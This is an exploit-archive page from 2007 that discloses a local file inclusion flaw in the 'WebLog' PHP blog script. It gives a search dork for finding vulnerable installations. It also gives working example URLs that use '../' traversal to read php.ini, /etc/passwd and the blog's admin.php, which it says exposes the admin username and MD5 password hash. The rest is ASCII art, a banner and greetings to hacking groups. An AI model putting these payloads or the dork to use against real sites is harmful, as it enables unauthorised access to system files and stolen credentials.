[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WebLog (index.php file) Remote File Disclosure Vulnerability
# Published : 2007-03-15
# Author : Dj7xpl
# Previous Title : Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit
# Next Title : Joomla Component RWCards <= 2.4.3 Remote SQL Injection Exploit


.-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :   http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
#
#
#   Exploit :   http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :   http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
#               http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
#               http://localhost/blog/index.php?show=showarticles&file=../admin.php   <<< username&password(md5)        
#    
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# www.Syue.com [2007-03-15]